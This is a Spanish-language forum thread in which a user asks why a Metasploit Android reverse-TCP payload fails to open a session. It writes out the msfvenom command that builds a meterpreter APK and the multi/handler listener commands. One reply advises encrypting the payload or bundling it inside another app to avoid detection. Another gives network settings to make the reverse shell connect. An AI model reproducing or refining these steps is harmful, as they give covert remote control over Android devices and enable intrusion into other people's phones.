Autor
|
Tema: android/reverse_tcp metasploit (AYUDA!) (Leído 5,348 veces)
|
dkbost
Desconectado
Mensajes: 1
|
Estoy aprendiendo a acceder remotamente a un dispositivo poniendo en practica mi propio dispositivo Android pero da un problema así que explicare como estoy haciendo: (cabe destacar que estoy usando un punto de acceso a wifi remoto 'uno de mis moviles')
abro la terminal y pongo lo siguiente:
msfvenom -p android/meterpreter/reverse_tcp lhost=(ip_portmap) lport=(puerto_portmap) > /root/Escritorio/salida.apk (tambien intente en lhost poner mi ip local y en lport 4545, a su vez intente tambien en lhost mi ip publica)
luego abro una terminal y uso openvpn (aqui la direccion de el archivo descargado desde portmap)
luego de que el apk se crea correctamente ejecuto metasploit v6.1.27-dev y uso los siguientes comandos: msfconsole use exploit/multi/handler set PAYLOAD android/meterpreter/reverce_tcp set LHOST (mi ip local) set LPORT 4545 (el puerto colocado en portmap) exploit -j
y me sale el siguiente mensaje:
exploit running as background job 0. exploit completed, but no sessions was created. started reverse tcp handler on 10.0.2.15:5555
hasta ahí todo va bien pero que pasa luego de todo ese proceso instalo el apk en mi teléfono, me salto las verificaciones de seguridad de Google play, le doy a instalar de todas maneras y fino se instala, luego de ahí ejecuto el mainactivity desde mi teléfono y no pasa absolutamente nada, la terminal de kali se queda tal cual estaba, ejecuto el comando sessions y me sale que no hay ninguna sesión activa y la verdad es que no entiendo que es lo que estoy haciendo mal, si alguien me podría ayudar lo agradecería mucho. :'(
|
|
|
En línea
|
|
|
|
Tirenex
Desconectado
Mensajes: 49
Los virus siempre se inyectan en Antivirus
|
Ten en cuenta que éstas actividades están penadas con cárcel, pero deberías encontrar alguna manera de cifrar ése exploit con algún programa, o combinandolo con alguna app, supongo,pero yo te recomendaría aprender cómo funciona ése exploit,la versión del exploit,pero al final, a base de intentos, seguro que lo lograrás,si no lo consigues de una manera, prueba con otra.
|
|
|
En línea
|
|
|
|
chinosor
Desconectado
Mensajes: 1
|
Hola. 1. Asegúrate de tener el puerto 4545 abierto en tu Router. 2. El payload se genera con el host y port de portmap. 3. Al momento de configurar el exploit en la consola de metasploit, la ip y puerto que tienes que poner la puedes encontrar en tun0 al momento de ejecutar el comando de ifconfig: $ ifconfig eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.253.132 netmask 255.255.255.0 broadcast 192.168.253.255 inet6 fe80::20c:29ff:fe1b:57dd prefixlen 64 scopeid 0x20<link> ether 00:0c:29:1b:57:dd txqueuelen 1000 (Ethernet) RX packets 157 bytes 37641 (36.7 KiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 52 bytes 7753 (7.5 KiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST> mtu 1500 inet 10.9.246.94 netmask 255.255.255.255 destination 10.9.246.93 inet6 fe80::f44a:ca6d:f9c6:4751 prefixlen 64 scopeid 0x20<link> unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 txqueuelen 50
Tendras que usar los datos de tun0. En este caso quedaria set LHOST 10.9.246.94 set LPORT (puerto que tienes abierto en el router, en tu caso 4545) Si esta todo correcto debería funcionar todo bien.
|
|
|
En línea
|
|
|
|
|
Mensajes similares |
|
Asunto |
Iniciado por |
Respuestas |
Vistas |
Último mensaje |
|
|
Ayuda kali linux android/meterpreter/reverse_tcp
Análisis y Diseño de Malware
|
MrVndT
|
1
|
3,518
|
20 Julio 2016, 16:21 pm
por MCKSys Argentina
|
|
|
Ataque a Android con Metasploit
Ingeniería Inversa
|
Iceberg
|
1
|
3,932
|
18 Julio 2017, 17:37 pm
por apuromafo CLS
|
|
|
android/meterpreter/reverse_tcp error por favor ayuda
GNU/Linux
|
log015
|
0
|
2,488
|
24 Agosto 2017, 02:08 am
por log015
|
|
|
error en payload android/meterpreter/reverse_tcp
Bugs y Exploits
|
log015
|
1
|
5,441
|
11 Enero 2018, 01:38 am
por ronluas
|
|
|
MSFVENOM/ android/payload/reverse_tcp
Hacking
|
sinpianwlr
|
1
|
4,247
|
29 Julio 2018, 13:22 pm
por CybeRoot
|
|